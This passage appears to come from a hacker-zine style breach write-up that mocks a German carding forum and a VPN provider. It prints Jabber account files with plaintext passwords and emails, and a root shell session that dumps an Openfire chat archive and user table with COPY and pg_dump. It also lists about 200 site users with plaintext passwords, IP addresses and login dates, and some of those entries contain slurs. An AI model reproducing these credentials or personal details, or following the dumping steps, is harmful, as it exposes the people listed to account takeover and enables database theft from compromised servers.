subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +sinned.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>vollidiot</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>sinned</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T19:03:31'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280862994' xdbns='jabber:iq:last'/></xdb> + +st3ffl0r.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>HanZ123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>st3ffl0r</username><name>Ich</name><email>iamweasel@marsmail.de</email><x 
xmlns='jabber:x:delay' stamp='20100805T11:28:40'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAF8AAABgCAIAAAD0AjnaAAAAA3NCSVQICAjb4U/gAAAgAElEQVR42oy8WZM...Mv9pCZHqyIEyWcPpVmUv22TEF3l1Kny8Js4m7WTLwiBvyVZn+a5hF/ENYv/jETXn6+WbfO0vYK7nQ1q+MOm5Hc8Nuu23wn2TSuNvKNqKcLc8efYMALyFjEOFaAQHV45gl85/x2yGLznPZ6jM75ju8LsTILanf/GAL4Ybff0qZ9Y8DcN5tCO3/QgU3B1qvXv3n9cgfNLl5Yvlb3PGXttQkAzPbZSNvvmq5yDV8b+PHjYIo8n1+vLpv2es77Hg1wvny59K8JuP+T9PTAv9D/H9sBRgei4KAAAAAElFTkSuQmCC</BINVAL></PHOTO></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281011278' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +syntax\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>seckin!kilic!91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntax\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:44:55'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'><message id='IoS3Q-21' to='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' from='naik@jabber-swissfaking.net/spark'><x xmlns='jabber:x:event'/><x xmlns='jabber:x:delay' from='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' stamp='20100805T11:07:06'>Offline Storage</x></message></foo><query xmlns='jabber:iq:last' last='1280928948' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item 
jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='to' subscribe=''><group>Swiss</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='to'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='to' subscribe=''><group>Swiss</group></item><item jid='el!t3@jabber-swissfaking.net' name='eL!t3' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='yaboybigt@jabber-swissfaking.net' name='yaboybigT' subscription='to'><group>Swiss</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='both'><group>Swiss</group></item><item jid='syntex@jabber-swissfaking.net' name='syntex' subscription='both'><group>Swiss</group></item></query></xdb> + +syntex.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>swissjabber</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:33:58'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281301960' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +theird21.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>00025879</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>theird21</username><email/><name/><x 
xmlns='jabber:x:delay' stamp='20100803T13:05:17'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280927487' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +the|biggie.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>aggro123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>the|biggie</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T20:33:39'>registered</x></query><query xmlns='jabber:iq:last' last='1280970373' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' 
name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='from' ask='subscribe'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +trickz.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>crazyfrog1234</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>trickz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T21:41:38'>registered</x></query><res id='spark'/><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='from'/><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='crankz@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' 
xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281303248' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +w!cked.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>fvcxy--</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w!cked</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T16:19:22'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280852527' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +w00dka.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>as_tave_myliu</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w00dka</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T18:07:26'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281222732' xdbns='jabber:iq:last'/></xdb> + +weareone.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Amstaff</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>weareone</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:30:36'>registered</x></query><res id='spark'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='dotsyn@jabber-swissfaking.net' name='dotsyn' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='donteron@thesecure.biz' 
subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1280970363' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +yaboybigt.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>73818444</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>yaboybigt</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T14:05:19'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281277327' xdbns='jabber:iq:last'/></xdb> + +# psql openfire openfire +Password for user openfire: +Welcome to psql 8.3.11, the PostgreSQL interactive terminal. + +openfire=# \l + List of databases + Name | Owner | Encoding +-----------+----------+----------- + openfire | openfire | UTF8 + postgres | postgres | SQL_ASCII + template0 | postgres | SQL_ASCII + template1 | postgres | SQL_ASCII +(4 rows) + +openfire=# \c openfire +You are now connected to database "openfire". 
+openfire=# \d + List of relations + Schema | Name | Type | Owner +--------+----------------------+-------+---------- + public | ofconparticipant | table | openfire + public | ofconversation | table | openfire + public | ofextcomponentconf | table | openfire + public | ofgroup | table | openfire + public | ofgroupprop | table | openfire + public | ofgroupuser | table | openfire + public | ofid | table | openfire + public | ofmessagearchive | table | openfire + public | ofmucaffiliation | table | openfire + public | ofmucconversationlog | table | openfire + public | ofmucmember | table | openfire + public | ofmucroom | table | openfire + public | ofmucroomprop | table | openfire + public | ofmucservice | table | openfire + public | ofmucserviceprop | table | openfire + public | ofoffline | table | openfire + public | ofpresence | table | openfire + public | ofprivacylist | table | openfire + public | ofprivate | table | openfire + public | ofproperty | table | openfire + public | ofpubsubaffiliation | table | openfire + public | ofpubsubdefaultconf | table | openfire + public | ofpubsubitem | table | openfire + public | ofpubsubnode | table | openfire + public | ofpubsubnodegroups | table | openfire + public | ofpubsubnodejids | table | openfire + public | ofpubsubsubscription | table | openfire + public | ofremoteserverconf | table | openfire + public | ofroster | table | openfire + public | ofrostergroups | table | openfire + public | ofrrds | table | openfire + public | ofsaslauthorized | table | openfire + public | ofsecurityauditlog | table | openfire + public | ofuser | table | openfire + public | ofuserflag | table | openfire + public | ofuserprop | table | openfire + public | ofvcard | table | openfire + public | ofversion | table | openfire +(38 rows) + +openfire=# COPY ofmessagearchive TO '/tmp/m_lawgs'; +COPY 2190 + +openfire=# COPY ofuser TO '/tmp/u_lawgs'; +COPY 313 + +openfire=# \q + +# pg_dump -U openfire openfire > /tmp/full_db +Password: + 
____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| fickmaus@jabber-swissfaking.net: | +| na carders brauch diesesmal wohl länger wa? | +| triple@jabber-swissfaking.net: | +| Jo | +| die haben immer noch ka | +| wie die lücke ist | +| ^^ | +|____________________________________________________________________| + +Why don't you shut up and go administrate your own board, +smarty-pants? Owait, Garcon! Make us a sandwich instead, you seem to +know your stuff when it comes to ordering a la carte. + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------=========={ Vpn24.org }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ + ~ | ||( );, + ( ,;.)-\ / ';, + \ ( \ ( + || \\ + /_( /_( +_____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Liebe Carders.CC Member, | +| | +| Wir sind wieder da und haben euch Top Angebote mitgebracht :) | +| | +| Wir bieten euch 100% non-logging OpenVPN, Socks5 und SSH Socks | +| Zugang auf unserem eigenen dedicated Server welcher in Russland | +| steht, absolut unantastbar für Deutsche Behörden. Unser | +| kompletter Service ist automatisiert, ihr könnt also schon in | +| wenigen Minuten 100% anonym unterwegs sein. | +| | +| ... | | +| VPN | Socks5 | +| Secure Connection | Secure Connection | +| Encryption AES-1024 | Encryption AES-512 | +|_________________________________|__________________________________| + +They offer the carders.cc members 100% non-logging proxies on their +own dedicated server which is located in Russia. 
They say that there +is no way for German authorities to get access to it and that their +service is fully automatic. The vpn connections are encrypted with +AES-1024 and the socks5 proxies are encrypted with AES-512. + +And that sounds awesome! You even invented two new encryptions? Let's +have a look at your webserver first, but, again, before we start, here +is a list (user:plain password:ip:date) from your website: + +janitor1:nroknetsr3g:87.118.118.37:January 6, 2011, 8:33 pm +jack123:heimatbrief:92.241.190.230:January 3, 2011, 3:54 pm +shore:shoreshore:202.71.103.246:January 6, 2011, 6:28 pm +hansi3000:w2z_RKDUU:212.117.177.110:January 5, 2011, 4:10 pm +tarnung91:frauholle49:78.52.52.123:January 4, 2011, 11:54 am +djdalio:123123:95.33.214.37:January 3, 2011, 5:03 pm +selfcut:rittersport:88.76.106.196:January 3, 2011, 1:10 pm +donkey:YX!"as78:84.183.121.124:January 3, 2011, 9:07 am +obama123:derneger123:84.137.90.85:January 5, 2011, 5:43 pm +neon1011:hassen11:91.43.254.141:January 3, 2011, 11:54 am +f18black:pizza1:91.33.20.147:January 6, 2011, 2:37 pm +hilli:ickeget6:85.17.161.84:January 6, 2011, 2:35 pm +schmidi327:g5fkigd2:95.33.42.207:January 6, 2011, 11:39 pm +12dima12:jafCc8Nk:212.117.172.231:January 3, 2011, 9:03 pm +blackmatrix:o75ev14J:87.185.157.32:January 7, 2011, 4:16 pm +hanswurst:volkan:92.76.11.157:January 5, 2011, 10:41 pm +ginal406:e*!ohWt7:92.241.190.253:January 3, 2011, 8:14 pm +edgeee:azerty123:92.241.165.69:January 7, 2011, 1:00 am +loowmanz:lowlowlow123:93.202.153.197:January 3, 2011, 7:51 am +basha:kriminell:92.241.165.69:January 4, 2011, 9:42 pm +zezol:4iP]XT4)om:79.170.124.248:January 3, 2011, 8:02 am +duden:galaxy:92.241.190.253:January 6, 2011, 9:35 pm +pill3:jackass123:212.117.172.231:January 5, 2011, 10:57 am +darkt0wn:marvin88:217.72.222.183:January 5, 2011, 8:06 pm +pyrodeath:b35ngf%:78.48.108.252:January 4, 2011, 12:55 pm +conviction:ichbingeil:92.241.190.253:January 3, 2011, 5:12 pm +blade1932:exaguqa5:92.241.190.253:January 3, 
2011, 2:51 pm +hackbart2:twd2005:92.241.190.253:January 3, 2011, 10:22 am +juryrusski:jocklerhans:77.0.30.113:January 4, 2011, 8:47 pm +h1xx3r:trustno1:84.23.74.92:January 4, 2011, 9:04 pm +romulus89:192837465:80.123.42.135:January 3, 2011, 12:26 pm +deluxe0160:tomtom:92.228.173.201:January 7, 2011, 10:08 pm +hanshans123:hanshans:212.117.161.80:January 4, 2011, 12:43 am +sanisan:19n4schk4tz385:84.184.246.137:January 6, 2011, 12:15 am +pan1c:tigerpommes:92.241.190.253:January 5, 2011, 11:43 am +revar:puppetteer:92.241.165.69:January 4, 2011, 1:45 pm +epoepo:union84:92.241.190.253:January 4, 2011, 1:37 pm +offlinejack:Jodelhe1n:88.76.253.194:January 6, 2011, 8:57 pm +weedtwo:70301995:92.241.190.253:January 6, 2011, 5:18 pm +pann0:pannopasch0:79.198.146.182:January 6, 2011, 6:02 pm +eve1992:sacred:88.67.149.150:January 6, 2011, 10:03 am +hi:suPPort_masterPass88:212.117.165.197:January 3, 2011, 2:27 am +det0x:veronika:92.241.190.253:January 4, 2011, 3:19 pm +malakas2:internet:212.117.172.231:January 3, 2011, 5:34 am +fahne:23102007:78.50.87.217:January 4, 2011, 6:30 pm +alanka:159369:85.25.165.138:January 3, 2011, 9:50 am +pfanner:deinemudda:92.204.37.77:January 3, 2011, 12:53 pm +delphinko:aLLanKoy0:87.118.118.37:January 3, 2011, 8:20 pm +timetraveller:a3Pq71ryK1:79.229.42.88:January 7, 2011, 8:56 pm +logg23:1q2w3e4r5t6z7u8i:212.117.172.231:January 6, 2011, 4:49 pm +teppich:oog4weeT1acu:157.95.211.201:January 5, 2011, 12:49 am +andreas7411:123456789a:88.65.104.195:January 3, 2011, 10:23 pm +n3v10:uLeiDee7:212.117.172.231:January 4, 2011, 1:24 pm +frezorx:123456:92.231.125.179:January 4, 2011, 3:11 am +winkel72:berlin123:193.107.16.122:January 3, 2011, 9:34 pm +trinx:meli1993:92.241.190.253:January 4, 2011, 3:38 pm +c4sh1:mkz4kzj:80.121.99.73:January 7, 2011, 1:04 am +tais46:spoiler:69.172.133.146:January 3, 2011, 1:36 pm +whazun:daspw123:93.195.74.65:January 4, 2011, 11:44 am +anubis:xy200xyx:79.213.81.205:January 5, 2011, 8:16 pm 
+hugo21:901051901051:91.54.21.252:January 4, 2011, 12:14 pm +doomlord:oxford:91.51.166.181:January 3, 2011, 6:53 pm +sense88:pitbull:91.66.61.177:January 5, 2011, 7:11 am +heavygun:vpn24private:91.6.0.76:January 6, 2011, 10:26 am +tombi:Spiele:92.241.190.253:January 5, 2011, 1:08 pm +messias91:qaywsx:92.241.165.69:January 6, 2011, 4:29 pm +lryzx33:deutschlandhackedbysolme:91.121.82.175:January 4, 2011, 6:04 pm +dre4m90:chillen:188.104.227.204:January 5, 2011, 10:56 am +slumski:Harley23:109.193.150.182:January 3, 2011, 7:55 pm +theultralooser:921234:92.241.190.81:January 4, 2011, 8:35 pm +keystyle:firatfirat911:92.241.165.69:January 6, 2011, 7:33 pm +hund123456:hund123456:46.114.42.253:January 4, 2011, 9:56 pm +chiller1337:episodeone:92.241.190.253:January 5, 2011, 11:48 am +turboprinz:886988:93.211.71.197:January 5, 2011, 9:25 pm +silverfox:tamil94thenud*:93.218.92.119:January 4, 2011, 9:22 am +ikas2:k7gh8uc3ph:77.11.24.196:January 7, 2011, 12:33 am +mrmcfly:vpn2426112004:213.163.65.50:January 6, 2011, 4:53 pm +weedtaxi:dura2131:93.222.176.113:January 4, 2011, 8:17 pm +boxer1:daniel:188.193.12.78:January 5, 2011, 7:02 pm +newb1:hans1234:92.241.165.69:January 6, 2011, 2:56 pm +bichlord:michael12B:94.217.109.99:January 4, 2011, 5:52 pm +neonaut:derotter:212.117.161.80:January 3, 2011, 11:45 am +abs0lut:liberate012:92.241.165.69:January 3, 2011, 3:53 pm +thalia:stachnik:81.210.157.177:January 4, 2011, 12:12 pm +dudgeri:dude123:212.117.165.197:January 3, 2011, 10:56 am +arider:amp483:77.189.15.2:January 4, 2011, 8:54 pm +iodas1:hallo123:87.147.65.130:January 4, 2011, 8:42 pm +hans2000:yxcvbnm22:84.59.141.5:January 6, 2011, 12:05 am +jungeguter:toko29473:79.195.50.220:January 3, 2011, 4:40 pm +th3sh4dow:han2jo4cu:88.69.160.243:January 7, 2011, 7:26 pm +pwnny:faker123:77.176.234.57:January 4, 2011, 9:16 am +papo00:papo0815:84.119.53.9:January 5, 2011, 8:24 pm +thehen:duhurensohn:77.22.65.135:January 3, 2011, 11:21 pm +random9999:dfds67621dd9999:199.48.147.41:January 3, 
2011, 7:03 pm +zorator:1q2w3e4r:91.121.72.221:January 3, 2011, 7:48 pm +xr34ct0r:spelock1909:212.117.163.21:January 3, 2011, 7:56 pm +deesr:timsilinsi:93.94.245.2:January 7, 2011, 6:19 pm +juliasutter:01305806:91.89.165.7:January 3, 2011, 5:22 pm +davidche:miezekatze:95.157.23.65:January 4, 2011, 10:37 pm +k1xy0:1qayxcv:92.75.20.99:January 5, 2011, 2:20 am +hyperion:sexysexy:212.117.172.231:January 3, 2011, 11:17 pm +emrano:go,schosch:92.241.165.69:January 3, 2011, 1:58 pm +razer111:hunter1:95.211.99.92:January 3, 2011, 11:30 am +asus123:intelatom:82.195.232.218:January 7, 2011, 4:41 pm +fruchtii:a1b2c3d4:87.118.118.37:January 3, 2011, 8:20 pm +mcott:123456:92.241.165.69:January 3, 2011, 1:38 pm +input:kingild:188.193.40.32:January 3, 2011, 6:15 pm +snowghost:7LKCFwm:78.53.114.62:January 5, 2011, 12:05 pm +fuckyou:fuckyou:212.117.177.110:January 6, 2011, 11:48 pm +snowmann:passwort:84.133.162.225:January 6, 2011, 7:43 am +nate23:hallo123:188.195.206.85:January 6, 2011, 4:10 am +smilenike:nippellecken:92.241.190.253:January 6, 2011, 10:33 pm +mastablasta:p4r4d153c1ty:62.141.39.222:January 3, 2011, 10:15 am +beware:er.,fs:93.213.21.9:January 3, 2011, 6:45 pm +5liter:Walter50:87.118.118.37:January 3, 2011, 4:49 am +d3struction:samson123:109.77.48.51:January 3, 2011, 4:48 pm +traden90:1234abcder:92.241.190.253:January 3, 2011, 5:46 pm +kaliber:kaliber44:79.218.97.68:January 6, 2011, 1:15 pm +styles:736286:212.117.172.231:January 3, 2011, 2:53 pm +thatslife:katze2:80.143.108.186:January 3, 2011, 11:49 pm +n8zm5gg:kfkfgkfg1:199.48.147.40:January 6, 2011, 12:58 pm +sparkasse:ficken:212.117.172.231:January 5, 2011, 2:17 am +p1r0x:timtimtim12:88.153.214.11:January 5, 2011, 1:31 pm +reideen:1kimmerle2:92.241.190.253:January 3, 2011, 10:03 am +shadowgamer:lumega34:84.19.169.236:January 6, 2011, 10:32 pm +kasanova:gentleman:92.241.190.253:January 4, 2011, 11:25 pm +anonymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:06 pm +thepu:asdf545:91.60.211.53:January 6, 2011, 4:26 pm 
+ixam123:chichi12345:79.240.150.109:January 4, 2011, 10:31 am +scanner1337:NL0AMGGG:93.221.58.122:January 3, 2011, 10:43 pm +xelni:kir123:92.241.190.253:January 6, 2011, 8:06 pm +nexus88:01230123:80.131.74.225:January 6, 2011, 2:10 am +meball:MeBall456:92.241.168.90:January 4, 2011, 7:39 pm +fuckdawn:former300:92.241.190.253:January 3, 2011, 12:06 pm +kdkdkd:abcabc123:85.177.152.182:January 4, 2011, 7:34 pm +nicvandebigdick:mezzomix:93.219.15.61:January 6, 2011, 3:52 am +alfalfa:57596300:85.176.120.193:January 3, 2011, 3:53 pm +kevin4ual:iloveu:92.241.190.253:January 4, 2011, 10:25 pm +simonsemmler:gangbang:92.78.143.171:January 3, 2011, 10:29 am +kuchen:asdasdasd:212.117.165.197:January 3, 2011, 2:21 am +peters:Bobchen2:77.181.106.195:January 3, 2011, 6:41 pm +anoymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:05 pm +pitbull69:9g3qW$23r$SZg8§$2GD3rg83:87.122.14.183:January 5, 2011, 8:45 pm +aschi2131:dura2131:93.222.176.113:January 4, 2011, 8:17 pm +testuser0:hurensohn:93.94.245.129:January 7, 2011, 4:20 am +makko:Lq=D)G92T2:79.228.238.216:January 3, 2011, 3:05 am +slash:busenbusen:82.195.232.218:January 4, 2011, 12:50 pm +thereplacer:fuckmyass:93.228.147.44:January 4, 2011, 6:48 pm +xxx3xxx4:derneger:92.241.190.253:January 5, 2011, 12:51 am +faxxer:hdgdla:90.134.58.200:January 5, 2011, 8:10 pm +magi007:imcool123:80.121.47.36:January 3, 2011, 2:47 pm +crack:novoline21:88.73.103.201:January 7, 2011, 12:55 am +bekanntmachungen:BEKANNTMACHUNGEN:89.204.137.175:January 3, 2011, 3:32 pm +ripit:gangbang123:212.117.172.231:January 4, 2011, 12:34 pm +mttsmtts:IgjTu0800zSv:93.134.103.213:January 3, 2011, 2:08 pm +dingdong:progamer:79.245.244.195:January 4, 2011, 12:13 pm +sa1nt:krankheit:91.7.92.101:January 5, 2011, 3:12 am +skilled:12345asdfg:94.23.114.4:January 4, 2011, 11:22 am +juden:test123:95.208.15.191:January 6, 2011, 12:13 pm +lolcat:i26nv1:79.204.36.137:January 3, 2011, 4:43 pm +docstrange:.denis.1203.:78.34.37.56:January 3, 2011, 3:56 pm 
+habadu:268413597:79.226.244.159:January 7, 2011, 12:05 am +loldielol:server1:91.55.112.62:January 5, 2011, 6:07 pm +kolumbus:infanterist2000:95.119.12.201:January 3, 2011, 8:31 pm +freefall:88866654:87.174.242.241:January 5, 2011, 10:27 am +lpboy:minkin:217.23.6.162:January 5, 2011, 8:10 pm +freaky123:05151942662:77.187.60.32:January 6, 2011, 12:32 am +kanye:Undertaker:92.241.165.69:January 5, 2011, 10:27 pm +codered:3081994:84.62.202.48:January 5, 2011, 4:21 pm +derboss:derboss:78.49.17.208:January 3, 2011, 8:52 pm +mandy:hallo123456:91.58.51.156:January 4, 2011, 3:58 pm +robmocdoc:881562:87.122.33.146:January 6, 2011, 3:07 pm +mcknad:masterxx1994:92.194.116.34:January 5, 2011, 6:45 pm +dre4m:gulliox90:188.104.236.248:January 4, 2011, 6:26 pm +matzeyooo:heheyo12345:212.117.172.231:January 6, 2011, 3:03 am +kerber0s:brennberg-1993:93.240.244.74:January 5, 2011, 5:43 pm +lenox26:250384:95.211.99.91:January 3, 2011, 6:41 pm +sidosido123:sidosido123:78.35.50.188:January 5, 2011, 1:53 am +mrsocke:fckgwrhqq2:77.189.137.162:January 4, 2011, 5:45 pm +schatten123:stinker:93.208.70.28:January 3, 2011, 6:56 pm +ev0lein:scheisripper:87.118.120.182:January 3, 2011, 5:53 pm +gweojk904trj:AOGWD55GMpUqCtB6Gsw2:92.241.190.253:January 4, 2011, 9:29 pm +wolfgang:florian90:85.178.145.194:January 3, 2011, 1:33 pm +cronic:67öänht53snjl:207.126.166.242:January 3, 2011, 10:04 pm +w333d:w333d1:92.241.168.90:January 3, 2011, 11:18 am +genetik10:s09101987:78.94.194.123:January 3, 2011, 2:19 pm +elektro:elektrisch1:77.12.190.94:January 3, 2011, 5:51 pm +amobios:welensitich9872582:89.149.242.16:January 3, 2011, 2:50 am +mablutze:tobias12:91.112.18.154:January 4, 2011, 8:43 pm +artist:yucatan1:82.198.80.81:January 4, 2011, 2:33 pm +dukeraider:muschi:188.193.200.182:January 3, 2011, 10:06 am +frankylo:Franky123456789*:95.211.13.145:January 3, 2011, 5:12 pm +dusa123:123456789:79.246.188.21:January 5, 2011, 1:14 am +asdfghjkl:carders231:84.161.40.27:January 5, 2011, 3:50 pm + +# uname -a +Linux 
